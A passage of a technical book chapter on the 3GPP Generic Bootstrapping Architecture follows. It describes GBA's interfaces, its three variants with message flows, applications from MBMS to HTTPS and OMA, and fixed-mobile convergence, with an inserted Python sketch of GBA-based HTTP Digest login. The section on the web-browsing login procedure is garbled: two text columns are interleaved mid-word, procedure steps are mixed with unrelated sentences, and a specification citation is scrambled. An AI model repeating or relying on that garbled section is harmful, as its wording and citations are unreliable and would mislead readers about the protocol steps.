The application. The basic setting is that we have an application server that offers services to the user. The application service does not necessarily need to be part of the operator's network. There is a general trend to outsource the application services to external parties and just take selected services into the "operator portal." This service should now be secured using the mobile smart card credentials and hence the existing trust relationship between the user and the operator. For this purpose, the service provider needs to have an agreement with the home operator of the user. This application server has two subcomponents: one that takes care of fetching credentials from the user's home network and is called network application function (NAF) in GBA, and then the actual application itself that uses the credentials to secure the communication with the mobile terminal, which we call application service.

The terminal. A 3GPP terminal is called user equipment (UE). In strict 3GPP terms it has two components, the smart card (UICC) and the mobile equipment (ME). We will refine this model slightly, by also distinguishing between the device platform and the application in the terminal. The



Figure 1. Generic bootstrapping architecture. Network side: HSS; bootstrapping server function (BSF); network application function (NAF) application server, consisting of the NAF server and the application service. User equipment: smart card, security module, and application with NAF client. Interfaces: Zh, credential fetching protocol (BSF to HSS); Zn, key distribution protocol (NAF server to BSF); Ub, bootstrapping protocol (security module to BSF); Ua, application protocol (NAF client to NAF server).

UE can authenticate with the network using cellular second generation (2G) or 3G-based authentication protocols. The intention is to reuse the authentication mechanism for the application communication security. Hence, we have a security module (see Figure 1) that communicates with the smart card and the so-called bootstrapping server function (BSF). Then there is the actual client application (NAF client) that communicates with the application server (NAF server) in the network and uses the application specific keys.

The smart card. 3GPP Release 6 and Release 7 GBA assume the existence of a UICC. The UICC contains an ISIM and/or USIM application. If the operator wishes that the application is really closely bound to the smart card, then he/she can utilize the so-called GBA aware smart card (GBA_U), where the application specific key generation and part of the storage is performed in the UICC. GBA can be used also with SIM cards. This 2G GBA was introduced in Release 7 in the 3GPP technical report (3GPP TR 33.920, Release 7) due to the large market need to allow operators to utilize the existing smart card infrastructure without being forced to hand out new smart cards immediately to the user to use GBA-based services.

The network. The heart of the network is the operator's subscriber database, the HSS, respectively the HLR with the accompanying AuC. This huge database is used to store the subscriber data, including the counterpart of the credentials (i.e., the master key) stored in the smart card that is handed out to the user and resides in the mobile terminal. This database provides the basic key material (i.e., the authentication vector) to the BSF, which is under mobile network operator control. This server can be seen as a credential server. Once the user is properly authenticated, the BSF generates the application specific keys, which are handed out to the application server, that is, the NAF.

The GBA system entities need to interact with each other to provision the application in the terminal and the application server with a shared secret that can then be utilized for various security purposes:

• Bootstrapping interface (Ub): The mobile terminal contacts the BSF, authenticates via authentication and key agreement (AKA), and triggers the key generation in the BSF. This interface is called the Ub interface and is defined in the 3GPP technical specification (3GPP TS 24.109, Release 6).
• Credential fetching interface (Zh): The application specific credentials are based on the mobile credentials stored in the subscriber database HSS of the operator. Therefore the BSF needs to obtain the AV to be able to establish an authentication session between the mobile terminal and the BSF and derive



further application specific keys. Also, some operator policies in the form of GBA user security settings (GUSS) can be stored in the HSS and passed to the BSF over this interface. The GUSS can contain application specific USSs and additionally BSF-specific guidance information, like user-specific key lifetimes and the UICC type of the user. The credential interface is defined as the Zh interface and specified in the 3GPP technical specification (3GPP TS 29.109, Release 6). This interface is operator internal and specified as being Diameter based (Calhoun, Loughney, Guttman, Zorn, & Arkko, 2003) by the Internet Engineering Task Force (IETF), but since many operators have highly customized HLR/HSS, it can be expected that operator-specific adjustments will be made (but likely not standardized).
• Key distribution interface (Zn): The application server has a library or a "plug-in" that requests the application-specific credentials, credential-related data, and USS from the credential server (BSF). This key distribution interface is in 3GPP Release 6 Diameter based and called the Zn interface. In Release 7, an alternative method was specified to support a Web services (WS)-based protocol, as this makes it easier for application developers to communicate with the credential server. Both implementations of the Zn interface are defined in the 3GPP technical specification (3GPP TS 29.109, Release 7).
• Application interface (Ua): The application-specific interface is called the Ua interface and is specified in 3GPP (TS 24.109, 2006). The details of the actual protocol used in the Ua interface depend on the actual use case, for example, browsing, streaming, and so forth. The derived application-specific credentials will be used to secure the communication of this interface; how this is done is application specific and defined in the application-specific specifications, for example, the 3GPP multimedia broadcast/multicast service (MBMS) technical specification (3GPP TS 33.246, Release 6).

The actual application-specific key generation consists of the following basic steps:

1. The user wishes to use a service. The application server wishes to utilize GBA to secure the communication to the terminal. Hence, the terminal is requested to use GBA. This information (i.e., whether GBA needs to be used) can be pre-configured in the NAF client, or the application server may indicate over the Ua interface that GBA should be used.
2. The NAF client triggers the security module in the terminal to bootstrap with the BSF utilizing AKA over the Ub bootstrapping interface.
3. The BSF then utilizes the Zh interface to fetch the needed data for the creation of the master session key. The BSF derives the master session key. Based on this master session key, NAF specific application keys are derived when a specific NAF requests it over the Zn interface later on. (Depending on the GBA type used, one or two application specific keys are derived.)
4. The resulting master session key and transaction ID are stored in the BSF server. The security module in the terminal also derives the master session key by contacting the smart card. The master session key and the transaction ID are stored in the security module. Note that here are small differences between the different GBA types. Based on this master session key, NAF-specific application keys are derived. The application-specific key is handed out to the NAF client application in the terminal as response to the initial trigger made in step 2. The application-specific key is used to secure the communication with the application server.
5. The NAF client in the terminal sends the transaction identifier to the NAF server in the application server over the Ua application interface. This transaction ID is needed so that the NAF can contact the BSF and fetch the correct keys.
6. The NAF server in the application server contacts the BSF to obtain the application-specific session keys from the BSF using the transaction identifier over the Zn key distribution interface.
7. The NAF server in the application server and the client in the terminal now share



Figure 2. HTTP based service request using GBA_ME (and GBA-unaware USIM). Participants: UE (GBA-unaware USIM, security module, terminal application), BSF, HSS, NAF. NAF specific key: Ks_NAF. Message flow:

1. Terminal application to NAF: HTTP request for a service
2. NAF to terminal application: 401 Unauthorized / 3GPP GBA authentication required
3. Terminal application to security module: Request for GBA keys (NAF_ID)
4. Security module to USIM: Query for IMSI; USIM to security module: IMSI
5. Security module to BSF: Bootstrapping initiation message (IMPI)
6. BSF to HSS: Query for AV, GUSS; HSS to BSF: GBA AV, GUSS
7. BSF to security module: Bootstrapping challenge (RAND, AUTN)
8. Security module to USIM: RAND, AUTN; USIM to security module: CK, IK, RES
9. Security module to BSF: Bootstrapping response (RES used as password)
10. BSF to security module: Bootstrapping OK (B-TID, key lifetime)
11. Security module to terminal application: B-TID, Ks_NAF, key lifetime
12. Terminal application to NAF: HTTP request that utilizes Ks_NAF as outlined by the application specification
13. NAF to BSF: B-TID, NAF_ID, [GBA_U_flag], [GSID*]
14. BSF to NAF: Ks_NAF, IMPI, key lifetime, [USS*]
15. Terminal application and NAF: Communication secured with Ks_NAF

application-specific key(s) that they can use for authentication or other ways to secure the communication between terminal and application server.

In 3GPP there are basically three different ways to generate application-specific credentials in GBA. The previous basic steps are the same for all three types and should be seen as the basic GBA scheme. The variations were caused by different security requirements, business models, and market needs. The three GBA types are:

• GBA_ME: This is the terminal-based GBA. It requires a 3GPP UICC smart card, but the smart card does not need to be specially configured to support GBA_ME. The UICC can contain either an ISIM or a USIM application that can be used by GBA. The master session key and the application-specific keys are derived in the terminal. GBA_ME is also sometimes referred to as "normal GBA". Figure 2 outlines the message flow for GBA_ME. GBA_ME is defined in the 3GPP technical specification (3GPP TS 33.220, Release 6).
• GBA_U: GBA_U is a GBA type that requires a special smart card that supports GBA and is "GBA aware." The motivation for this was that the cryptographic key generation is then bound very closely to the smart card and the issuing operator. The master key and the application-specific keys (Ks_ext_NAF and Ks_int_NAF) are derived in the GBA aware USIM application in a UICC. Only the Ks_ext_NAF application-specific session key is handed out to the terminal. A second application-specific session key, Ks_int_NAF, is not handed out and is stored and used only in the UICC. Figure 3 outlines the message flow for GBA_U. GBA_U is defined in 3GPP (TS 33.220, Release 6). It should be noted that the BSF modifies the AV received from the HSS. This gives an indication to the GBA-aware USIM, and the USIM returns just the RES and not the secret CK and IK keys to the terminal. The details on how those keys are used are defined by the application-specific documents, like MBMS (3GPP TS 33.246, 2006), HTTPS (3GPP TS 33.222, 2006) or



Figure 3. HTTP-based service request using GBA_U (GBA-aware USIM). Participants: UE (GBA-aware USIM, security module, terminal application), BSF, HSS, NAF. NAF specific keys: Ks_int_NAF, Ks_ext_NAF. Message flow:

1. Terminal application to NAF: HTTP request for a service
2. NAF to terminal application: 401 Unauthorized / 3GPP GBA authentication required
3. Terminal application to security module: Request for GBA keys (NAF_ID)
4. Security module to USIM: Query for IMSI; USIM to security module: IMSI
5. Security module to BSF: Bootstrapping initiation message (IMPI)
6. BSF to HSS: Query for AV, GUSS; HSS to BSF: GBA AV, GUSS
7. BSF to security module: Bootstrapping challenge (RAND, AUTN)
8. Security module to USIM: RAND, AUTN; USIM to security module: RES (CK and IK stay in the USIM)
9. Security module to BSF: Bootstrapping response (RES used as password)
10. BSF to security module: Bootstrapping OK (B-TID, key lifetime)
11. Security module to USIM: B-TID, key lifetime, then NAF_ID, IMPI; USIM to security module: Ks_ext_NAF
12. Security module to terminal application: B-TID, Ks_ext_NAF, key lifetime
13. Terminal application to NAF: HTTP request that utilizes Ks_ext_NAF as outlined by the application specification (e.g. MBMS, HTTPS, etc.)
14. NAF to BSF: B-TID, NAF_ID, GBA_U_flag, [GSID*]
15. BSF to NAF: Ks_ext_NAF, Ks_int_NAF, IMPI, key lifetime, [USS*]
16. Terminal application and NAF: Communication secured with Ks_ext_NAF
17. NAF and USIM: Secure data with Ks_int_NAF key; Secured data; Communication secured with Ks_int_NAF

the OMA broadcast (BCAST) smart card profile.
• 2G GBA: The 2G GBA or legacy GBA is a recent 3GPP GBA feature and defined in the technical report (3GPP TR 33.920, 2006) as an early implementation feature for Release 7. It outlines the usage of the SIM card for GBA. It should be noted that it does not describe the usage of legacy network nodes with GBA. The large deployment range of SIM cards created the need for a GBA credential generation solution that is based on legacy SIM cards and does not require immediate handing out of new UICC smart cards to the user. To obtain a security level similar to GBA_ME, the BSF node in the network is authenticated via a transport layer security (TLS) tunnel. The key derivation differs slightly, but the key usage is similar to GBA_ME. Figure 4 outlines the message flow for 2G GBA.

The notation for Figures 2, 3, and 4 is that the * denotes an optional element.

In all, these three bootstrapping types have in common the basic steps outlined previously, and only the key generation and storage varies slightly. For the application server the usage of GBA_ME and 2G GBA is transparent. The convergence of fixed and mobile networks is, at the time of this writing, raising new GBA variants that will be discussed later in this chapter under Future Trends.

The specification family related to GBA has grown substantially due to new application requirements, further use cases, and new security enablers that were added. This will be outlined in the next section. The GBA can also be utilized to provision a user with a subscriber certificate and also for trusted root certificate provisioning in public key infrastructure (PKI) systems. These are outlined in the 3GPP technical specification (3GPP TS 33.221, Release 6).

The term GBA refers typically to the core of GBA, where a master key is established between the mobile terminal (UE) and the network (BSF). Generic authentication architecture (GAA), on the other hand, refers typically to the actual usage of the service specific keys that have been derived



Figure 4. HTTP based service request using 2G GBA. Participants: UE (legacy SIM card, security module, terminal application), BSF, HSS, NAF. NAF specific key: Ks_NAF. Message flow:

1. Terminal application to NAF: HTTP request for a service
2. NAF to terminal application: 401 Unauthorized / 3GPP GBA authentication required
3. Terminal application to security module: Request for GBA keys (NAF_ID)
4. Security module to SIM: Query for IMSI; SIM to security module: IMSI
5. Security module to BSF: Bootstrapping initiation message (IMPI), inside a TLS tunnel (BSF authenticated using certificate)
6. BSF to HSS: Query for AV, GUSS; HSS to BSF: GBA AV, GUSS
7. BSF to security module: Bootstrapping challenge (RAND, AUTN)
8. Security module to SIM: RAND; SIM to security module: Kc, RES
9. Security module to BSF: Bootstrapping response (RES used as password)
10. BSF to security module: Bootstrapping OK (B-TID, key lifetime)
11. Security module to terminal application: B-TID, Ks_NAF, key lifetime
12. Terminal application to NAF: HTTP request that utilizes Ks_NAF as outlined by the application specification
13. NAF to BSF: B-TID, NAF_ID, [GBA_U_flag], [GSID*]
14. BSF to NAF: Ks_NAF, IMPI, key lifetime, [USS*]
15. Terminal application and NAF: Communication secured with Ks_NAF

Figure 5. Generic authentication/bootstrapping architecture. GBA part: HSS; bootstrapping server function (BSF); security module and smart card in the user equipment (UE); Zh, credential fetching protocol (BSF to HSS); Ub, bootstrapping protocol (security module to BSF). GAA part: network application function (NAF) application server; NAF client in the UE; Zn, key distribution protocol (NAF to BSF); Ua, application protocol (NAF client to NAF).


from the master key. Thus, GBA refers to the core functionality and GAA to the actual usage of GBA in use cases, as depicted in Figure 5, but often it is not necessary to differentiate strictly.

GAA and GBA are not only evolving in 3GPP, but also in the American counterpart standardization organization, the 3GPP2 (http://www.3gpp2.org/). 3GPP2 utilizes the removable user identity module (R-UIM) as a security baseline for their dialect of GBA. 3GPP2 GBA supports the 3GPP2 legacy algorithms Cellular Authentication and Voice Encryption (CAVE), which is used in the American CDMA 1x standard, and challenge handshake authentication protocol (CHAP), which is used in American code division multiple access (CDMA) 1xEvDo (evolution data only), but also AKA for the user authentication. For further details on 3GPP2 GBA, please consult the relevant specification (3GPP2 TS S.S0109, 2006).

APPLICATION SECURITY BASED ON THE GENERIC BOOTSTRAPPING ARCHITECTURE

In the beginning, GBA was developed to securely provide the user with subscriber certificates, that is, the initial registration of the user to a public key infrastructure (PKI) system is authenticated using cellular authentication. The function to provide an application-specific shared secret based on the mobile credentials to a terminal and a network node evolved to a generic enabler for many use cases and services. In this context, terminal refers to a 3GPP or 3GPP2 mobile phone.

GBA is not only used for a large range of applications that reside in a mobile network, but also for fixed broadband access security and their access devices (e.g., PC or laptop). The work on GBA for the next 3GPP Release 8 and the integration of GBA into future B3G networks will be discussed in the next section. In this section we outline the different existing applications that use GBA as a security enabler. We will not go into the details of each application, but focus on the usage of GBA.

Mobile Networks Applications Using GBA

GBA was initiated by 3GPP; hence the first applications that utilize GBA were also from 3GPP in their Release 6 and 7. The first service to mandate the usage of GBA is the 3GPP mobile broadcast/multicast service (MBMS) (3GPP TS 33.246, Release 6). The broadcast scenario poses some very special requirements on a key derivation and management system, that is, a content provider specific key that can be linked to a mobile user identity stored on the smart card, protection of the content protection keys (key confidentiality during transport), and the baseline security key should not be transported over the air. This resulted in the fact that MBMS has a quite sophisticated four layer key hierarchy, where the user-specific keys are established using GBA.

Another use case is general authenticated Web browsing. A user browses to a Web page that needs authentication. This is a quite common occurrence in the Internet, and there a user typically then has to provide a username/password combination. Inserting a password on a mobile key pad is not very user friendly and would likely result in non-secure passwords, that is, passwords without special characters, very short, with no upper/lower case combinations. Many security solutions ignore the usability aspect and try to force the user, which usually results in more or less expensive password recovery systems. In the mobile environment, with a small key pad, inserting long, secure passwords with special characters is not user friendly. The integration of an automatic scheme that provides automatically an application-specific username/password pair to the browser request is therefore desirable for the mobile environment. From a user perspective, the authentication would either be seamless (i.e., the user does not even notice that this is ongoing) or it would be very similar to the user experience where the password is stored by the browser. The technical side of the procedure runs as follows:

1. User contacts a service that requires HTTP digest authentication.


Generic Application Security in Current and Future Networks

2. The service triggers the terminal to generate application servers, depending on the request.
anapplication-specificsharedsecret. The AP Thismayisadd an assertion of identity of the
then established using GBA without further subscriber for use by the application server, when
user interaction. the AP forwards the request from the terminal to
3. The transaction ID are put into the username the application server.
fieldandthesharedapplication-specific secret
Operators can also utilize GBA for device
isputintothepasswordfield. management. For this use case, a device manage-
4. The data is validated and the user can access ment server takes the role of a NAF and establishes
the service. a HTTPS tunnel to the UICC as outlined in the
The details of this procedure can be found in 3GPP technical report (3GPP TR 33.918, Release
theGPP 3 specificationsGPP 3 ( TSRelease
, 02. 3 7). Through this secure tunnel the device manage-
6) and (3GPP TS 33.222, Release 6). ment information is then sent.
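The four-step login above, worked through as an added example (not code from the chapter, from 3GPP or from any product): a terminal that has bootstrapped Ks answers a NAF's HTTP Digest challenge with its B-TID as username and the NAF-specific key as password, and the NAF checks it by fetching that key over a stand-in for the Zn interface. The key derivation is an HMAC stand-in rather than the 3GPP TS 33.220 KDF, and the B-TID, IMPI, NAF name, resource path and all key material are constructed assumptions.

```python
import base64
import hashlib
import hmac
import secrets

# Constructed sample bootstrapping result (assumption): after GBA bootstrapping the
# terminal and the BSF share Ks, referenced by the B-TID. No NAF ever sees Ks itself.
SAMPLE_KS = bytes.fromhex("00112233445566778899aabbccddeeff" * 2)
SAMPLE_RAND = bytes.fromhex("0f0e0d0c0b0a09080706050403020100")
SAMPLE_IMPI = "user@ims.example.invalid"      # constructed private identity
SAMPLE_BTID = "c2FtcGxl@bsf.example.invalid"  # constructed B-TID (transaction ID)
NAF_ID = "naf.example.invalid"                 # constructed application server name
URI = "/mail/inbox"                            # constructed protected resource


def derive_ks_naf(ks, rand, impi, naf_id):
    # Stand-in NAF-specific derivation (assumption; NOT the 3GPP TS 33.220 KDF). Binding
    # the NAF identity into the key lets one bootstrapping serve many services.
    label = b"gba-me" + rand + impi.encode() + naf_id.encode()
    return hmac.new(ks, label, hashlib.sha256).digest()

def _md5(s): return hashlib.md5(s.encode()).hexdigest()

def digest_response(username, password, realm, method, uri, nonce, nc, cnonce):
    # RFC 2617 HTTP Digest response with qop=auth.
    ha1 = _md5(f"{username}:{realm}:{password}")
    ha2 = _md5(f"{method}:{uri}")
    return _md5(f"{ha1}:{nonce}:{nc}:{cnonce}:auth:{ha2}")

class BSF:
    # Bootstrapping server function; zn_fetch stands in for the Zn interface and
    # hands out only the NAF-specific key, never Ks.
    def __init__(self, sessions):
        self.sessions = sessions  # B-TID -> (Ks, RAND, IMPI)
    def zn_fetch(self, btid, naf_id):
        rec = self.sessions.get(btid)
        if rec is None:
            return None  # unknown or expired B-TID
        ks, rand, impi = rec
        return derive_ks_naf(ks, rand, impi, naf_id)

class Terminal:
    # UE side: holds Ks after bootstrapping (step 2 of the procedure).
    def __init__(self, ks, rand, impi, btid):
        self.ks, self.rand, self.impi, self.btid = ks, rand, impi, btid
    def answer_challenge(self, naf_id, challenge, method, uri):
        # Step 3: B-TID goes into the username field, the NAF-specific key
        # (base64-encoded here) into the password field; no user interaction.
        ks_naf = derive_ks_naf(self.ks, self.rand, self.impi, naf_id)
        password = base64.b64encode(ks_naf).decode()
        cnonce, nc = secrets.token_hex(8), "00000001"
        return {
            "username": self.btid, "realm": challenge["realm"], "uri": uri,
            "nonce": challenge["nonce"], "cnonce": cnonce, "nc": nc,
            "response": digest_response(self.btid, password, challenge["realm"],
                                        method, uri, challenge["nonce"], nc, cnonce),
        }

class NAF:
    # Application server, or an authentication proxy acting as NAF on its behalf.
    def __init__(self, naf_id, bsf):
        self.naf_id, self.bsf = naf_id, bsf
        self.realm = f"3GPP-bootstrapping@{naf_id}"
    def challenge(self):
        # Step 1: the service answers with a 401 carrying a fresh server nonce.
        return {"realm": self.realm, "nonce": secrets.token_hex(16)}
    def verify(self, method, uri, auth, challenge):
        # Step 4: reject a stale or foreign challenge, fetch Ks_NAF for this B-TID
        # over Zn, recompute the digest and compare it in constant time.
        if auth["nonce"] != challenge["nonce"] or auth["realm"] != self.realm:
            return False
        ks_naf = self.bsf.zn_fetch(auth["username"], self.naf_id)
        if ks_naf is None:
            return False  # the terminal has to bootstrap again first
        password = base64.b64encode(ks_naf).decode()
        expected = digest_response(auth["username"], password, self.realm, method,
                                   uri, challenge["nonce"], auth["nc"], auth["cnonce"])
        return hmac.compare_digest(expected, auth["response"])

def _setup(btid=SAMPLE_BTID):
    bsf = BSF({SAMPLE_BTID: (SAMPLE_KS, SAMPLE_RAND, SAMPLE_IMPI)})
    return Terminal(SAMPLE_KS, SAMPLE_RAND, SAMPLE_IMPI, btid), NAF(NAF_ID, bsf)

def run_login(naf_id_used_by_terminal=NAF_ID, btid=SAMPLE_BTID):
    # Full exchange; True when the NAF accepts. A terminal that derived its key
    # for another NAF, or that presents an unknown B-TID, is rejected.
    ue, naf = _setup(btid)
    ch = naf.challenge()
    auth = ue.answer_challenge(naf_id_used_by_terminal, ch, "GET", URI)
    return naf.verify("GET", URI, auth, ch)

def replay_rejected():
    # A captured Authorization header is useless against a later challenge.
    ue, naf = _setup()
    first, later = naf.challenge(), naf.challenge()
    auth = ue.answer_challenge(NAF_ID, first, "GET", URI)
    return naf.verify("GET", URI, auth, first) and not naf.verify("GET", URI, auth, later)
```

Because the key is bound to the NAF identity, a response prepared for one server is rejected by another, and the nonce check rejects a replayed Authorization header.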
Web sites that request confidential data are often secured using TLS 1.0 or Secure Socket Layer (SSL) 3.0, which can be considered equivalent. GBA was integrated into the usage of TLS between a mobile terminal and an application server in 3GPP Release 6 (3GPP TS 33.222, Release 6). At the end of 2005 the Internet Engineering Task Force specified the usage of Pre-Shared Key TLS in the IETF (RFC 4279) (Eronen & Tschofenig, 2005). 3GPP integrated the PSK TLS, since pre-shared key computations are very suitable for low capability devices like mobile phones (3GPP TS 33.222, Release 6). It should also be noted that PSK TLS can also be used with IETF Datagram TLS (Rescorla & Modadugu, 2006).

A user may access a service directly or through an authentication proxy (AP) that takes care of the authentication-related tasks on behalf of the actual application server. If an operator offers many services, then he/she may wish to deploy such an authentication proxy to centralize the user authentication task in one node. An AP is an HTTP reverse proxy which takes the role of the GBA NAF node (the application server) for the terminal. The AP handles the TLS security relation with the terminal and is the TLS end point. GBA is used to ensure for the application server that the service request is coming from an authorized user. The AP has the Zn interface towards the BSF and the Ua interface towards the terminal. When a HTTPS request is sent from the terminal to the application server that resides behind an AP, then the AP terminates the TLS tunnel and performs the terminal authentication. The AP proxies the HTTP requests received from the UE to one or many application servers, depending on the request. The AP may add an assertion of identity of the subscriber for use by the application server when the AP forwards the request from the terminal to the application server.

The European Telecommunications Standards Institute (ETSI) has a Smart Card Platform Group that has defined some use cases, like mobile banking and digital rights management (DRM), which require the existence of a secure channel between the terminal and the UICC smart card. They asked 3GPP to define the key management for this functionality. This was done based on GBA in the 3GPP technical specification (3GPP TS 33.110, Release 7) and is expected to be part of 3GPP Release 7. It remains to be seen which of the use cases defined by the smart card group will be implemented.

Network Agnostic Usage of GBA

GBA is also used outside of the classical mobile environment of 3GPP. The OMA defines bearer agnostic functionalities and services. Since authentication is in most cases bound to the bearer, some specifications integrate the authentication of the underlying bearer and provide additional functionality for the case that another access type is used. GBA is used by the following OMA applications:

• OMA broadcast smart card profile (BCAST) (2007) defines the usage of a smart card profile for content protection using a four-layer key hierarchy based on GBA (similar to the MBMS key hierarchy).
• In OMA presence and availability working Group (PAG) (2006) the content server relies on external authentication and authorization done for the presence sources that may reside
on the mobile terminal, and watcher nodes. For this authentication and authorization GBA as defined in the 3GPP technical specification (3GPP TS 33.222, Release 6) can be used for that purpose, acting as an AP.
• OMA secure user plane location (SUPL) (2006) defines how the terminal can acquire its own location from the network, and this messaging between the terminal and the network can be optionally protected by GBA.
• OMA XML document management (XDM) and OMA aggregation proxy were specified by the OMA presence and availability working group (PAG) (2006). These specifications define mechanisms for how terminals can manage XML documents in the network servers. The authentication can optionally be based on GBA, and the authenticating node in the network can be either the XDM server itself, or it can be centralized using an aggregation proxy, where all traffic to XDM servers is routed through the proxy.
• OMA common security functions (CSF) (OMA Security Working Group, 2005) defines a generic GBA Profile (GBA Profile) that acts as an enabler and that other OMA applications and enablers can use when they are defining the usage of GBA in them.

Another important standardization body where GBA fits in is the Liberty Alliance Project. The Liberty Alliance Project enables identity federation (alias single sign-on) and Web service security. It is a non-mobile centric consortium that uses the provided user authentication, but does not specify the actual means of authentication and its context. This is left to the standardization bodies, which define the actual authentication method. 3GPP integrated their GBA to be used seamlessly with the Liberty Alliance Project Identity Federation Framework and the Web Service Framework. The details of this interworking are specified in the 3GPP technical report (3GPP TR 33.980, Release 6).

These are only some examples of the possible usage of GBA outside of 3GPP; many non-standardized use cases are also enabled. GBA could be utilized for enterprise access or other use cases where a shared secret between a terminal and a network server is needed.

Fixed-Mobile Convergence and GBA

The term converging networks has become a key phrase in the latest network evolution work. The trend to merge mobile and fixed network backend systems is caused by several factors:

• Fewer and larger operators: There is a general consolidation trend in the industry, which results in large, often international, operators. These operators often have a fixed network and a mobile network. For them it is important that they can use one backend to serve both access types.
• New players: The boundaries between technologies are vanishing, as voice over IP shows us. These new players appear and want to utilize the existing technology, but on the other hand want to preserve the investments into infrastructure. Especially for fixed networks the investments are substantial. Multi-network devices are no longer future, but commercially available. This results in extensions to the existing “pure” mobile specific standards to integrate the new requirements and network types.
• Seamless services: The general mobility trend creates high user expectations: when something works with a fixed network, then it is also expected that it works seamlessly in a mobile environment. This can only be provided with a unified backend service system.

The fixed mobile convergence is focused around the IP multimedia subsystem (IMS), but GBA as a general security enabler for applications moved quickly into the scene. The most prominent drivers of mobile and fixed convergence outside of 3GPP are TISPAN and CableLabs.

The telecoms & Internet converged services & protocols for advanced networks (TISPAN) is a standardization body of the ETSI (n.d.). TISPAN focuses on fixed networks and migration from
swit ched circuit networks to packet-based networks with an architecture that can serve in both. TISPAN shares the same IMS specified by 3GPP. The idea is to keep the unity of IMS preserved by specifying the IMS core in 3GPP and TISPAN specific add-ons in TISPAN or 3GPP, depending on the working groups’ agreements.

The TISPAN Release 1, which was finalized in 2006, is based upon the 3GPP IMS Release 6 and selected aspects of the Release 7 architecture (which finishes early 2007). TISPAN standardizes functionalities or brings them into 3GPP for present and future converged networks, including the next generation networks (NGN). TISPAN utilizes GBA in their security architecture (ETSI TS 187.003, 2006) for the protection of the XML configuration access protocol (XCAP) traffic between a terminal and an application server using 3GPP TS 33.222 (2006) over their Ut interface. Optionally, an AP can be integrated into this interface.

CableLabs (http://www.cablelabs.com/) is a consortium of cable network providers with focus on Northern America. They are interested in utilizing the 3GPP specifications in their systems. In November 2006 a work item description that outlines the intended convergence security work was approved in the 3GPP security group, document number (3GPP Work Item Description S3-060764, 2006), with the title “IMS Enhancements for Security Requirements in Support of Cable Deployments.” This work item proposes, among other extensions, also a CableLabs specific extension to the 3GPP GBA “core” specification TS 33.220 (Release 6). The outlined extensions include the possibility to bootstrap a shared secret from a username/password. In other words, the user would authenticate in a first step with his/her username/password. This pair would then serve as a baseline for further application-specific key generation. The user would not need to remember a new username/password pair for every service, but would potentially just have one CableLabs username/password pair that could also be centrally managed. The details of this are work in progress, and the final key derivation methods and further details still have to be fully defined in the near future (i.e., during year 2008).

FUTURE TRENDS AND GENERIC AUTHENTICATION IN BEYOND 3G NETWORKS

The wider deployment and adoption of GBA by the OMA created the need for a solution where an application server can trigger the key generation and send the needed key generation data (not the keys) to the mobile terminal. If this functionality is available, it would allow continuous service provisioning and a broader usage of GBA-based functionalities for broadcast use cases. 3GPP started working on a Technical Specification, the GBA Credential Push Specification (3GPP TS 33.223, Release 8), that allows an application server (NAF) to trigger the key generation procedure at the network side and push the required data to the terminal. Upon receiving this data the terminal would generate the keys without having a channel back to the network. The specification work has started in 3GPP and is targeted to be part of Release 8.

GBA has also been utilized to establish a shared secret between two entities. The main element in this use case is the so-called NAF key center, and it can be used to establish a shared secret either between the UICC and the ME (3GPP TS 33.110, Release 7) or between two devices where one of the devices is holding the UICC and the other is not (3GPP TS 33.259, Release 7). This shared secret can then be used to secure the link between those two entities. The secure communication can then be used for any kind of application, for example, streaming.

The work on future networks after 3G has started in 3GPP. The work on the definition of a security framework for the core network system architecture evolution (SAE) and for the radio access network long term evolution (LTE) is ongoing. Sometimes this work is also referred to as fourth generation (4G) or B3G networks. The work there assumes that there will be a larger range of networks and that mobility between them is a key requirement. GBA was chosen as an enabler for mobile IP security in the setting that the related home agent (3GPP HA) resides in the 3G network. The SAE/LTE work is just evolving, so further usage of GBA and additions and modifications
can be expected with the progress of the work. On a high level, the basic trust relationship between the Mobile IP communication partners defines the needed security associations independently of the actual protocol version used.

There is the trust relationship between the terminal and the 3GPP authentication, authorization and accounting (AAA) server that resides in the user’s home network and is in charge of the user authentication (e.g., using AKA) and authorization. This trust relationship is founded on the user’s subscription to his/her home network and secured via a shared secret that can be assumed to be long-lived. The mobile IP authentication is independent of the access authentication, which is analogous to the case where a user uses a service and requires authentication there. Hence, GBA could be used for mobile IP key provisioning.

The second trust relationship is between the 3GPP Mobile IP (MIP) HA and the user’s terminal, so that the HA can act on behalf of the terminal for the tasks related to mobility. The relationship between these two entities is established dynamically (in the sense that there is no pre-provisioned shared secret) so the integrity of the MIP signaling can be ensured, and depends on the actual mobile IP version used, that is, Mobile IPv4 or Mobile IPv6 (or DS-MIPv6). 3GPP has at the point of writing only made the decision for Mobile IPv4. The decisions if MIPv6 or DS-MIPv6 will be used are not yet taken in 3GPP (status December 2006).

The third trust relationship is between the 3GPP MIP HA and the 3GPP AAA server. The trust between those nodes is high, since they are part of the same network for the non-roaming case. For non-roaming cases there exist interoperator security protocols, like network domain security (NDS)/IP security or IPsec. This trust relationship does not require GBA, since there is no user involvement.

CONCLUSION

The GBA allows secure provisioning of a shared secret to a mobile terminal and an application server based on cellular authentication. This shared secret can then be used for many purposes, like username/password authentication, certificate enrollment, DRM, and so forth. GBA was originally designed by the 3GPP, but has recently been taken up for long term evolution networks, fixed broadband access, and cable networks.

ACKNOWLEDGMENT

Part of this work has been performed in the framework of the IST project System Engineering for Security and Dependability (SERENITY) and the Service Platform for Innovative Communication Environment (SPICE) project. The authors would like to acknowledge the contributions and review of their colleagues from Nokia Corporation.

REFERENCES

3rd Generation Partnership Project 2 (3GPP2) TS S.S0109-0. (2006). Generic bootstrapping architecture (GBA) framework, version 1.0. Retrieved from http://www.3gpp2.org/Public_html/specs/S.S0109-0_v1.0_060331.pdf

3rd Generation Partnership Project (3GPP) Work Item Description S3-060764. (2006, November). IMS enhancements for security requirements in support of cable deployments. Retrieved from http://www.3gpp.org/ftp/tsg_sa/WG3_Security/TSGS3_45_Ashburn/Docs/

3rd Generation Partnership Project (3GPP) TS 24.109. (Release 6). Bootstrapping interface (Ub) and network application function interface (Ua); Protocol details. Retrieved from http://www.3gpp.org/ftp/Specs/html-info/24109.htm

3rd Generation Partnership Project (3GPP) TS 29.109. (Release 6). Generic authentication architecture (GAA); Zh and Zn interfaces based on the Diameter protocol; Stage 3. Retrieved from http://www.3gpp.org/ftp/Specs/html-info/29109.htm

3rd Generation Partnership Project (3GPP) TS 33.110. (Release 8). Key establishment between
UICC and a terminal. Retrieved from http://www.3gpp.org/ftp/Specs/html-info/33110.htm

3rd Generation Partnership Project (3GPP) TS 33.203. (Release 7). 3G security; Access security for IP-based services. Retrieved from http://www.3gpp.org/ftp/Specs/html-info/33203.htm

